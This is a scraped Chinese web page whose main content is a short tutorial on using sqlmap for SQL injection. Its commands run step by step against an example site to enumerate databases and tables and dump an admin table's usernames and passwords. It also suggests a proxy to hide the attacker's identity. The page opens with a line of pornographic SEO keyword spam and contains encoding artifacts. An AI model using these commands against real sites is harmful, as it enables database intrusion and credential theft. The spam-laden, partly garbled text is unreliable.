日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢(xún)
選擇下列產(chǎn)品馬上在線(xiàn)溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷(xiāo)解決方案
sqlmap注入常見(jiàn)用法一條龍

sqlmap是一個(gè)灰常強(qiáng)大的sql注入檢測(cè)與輔助工具,但是由于沒(méi)有圖形界面,基本上用起來(lái)比較麻煩,導(dǎo)致很多人可能寧愿用havij或者是pangolin也不愿意麻煩去翻幫助界面,我自己也是把很多語(yǔ)句貼到了一個(gè)記事本里面用,其實(shí)真正用起來(lái)也就5,6句,也不會(huì)太復(fù)雜,下文以php+mysql為例:

檢查注入點(diǎn)sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

列數(shù)據(jù)庫(kù)信息sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

指定庫(kù)名列出所有表sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables

指定庫(kù)名表名列出所有字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns

指定庫(kù)名表名字段dump出指定字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump

有幾個(gè)參數(shù)可能會(huì)用到,直接加在***面就可以了,更多詳細(xì)參數(shù)見(jiàn)官方文檔:

--cookie=COOKIE 在需要登錄的地方,需要登錄后的cookie

--proxy="http://127.0.0.1:8087" 使用HTTP代理隱藏自己的身份,比如使用goagent等

--sql-query=QUERY 執(zhí)行一個(gè)sql語(yǔ)句,不一定支持

過(guò)程的幾張圖如下:

 


本文名稱(chēng):sqlmap注入常見(jiàn)用法一條龍
文章URL:http://www.dlmjj.cn/article/djspddg.html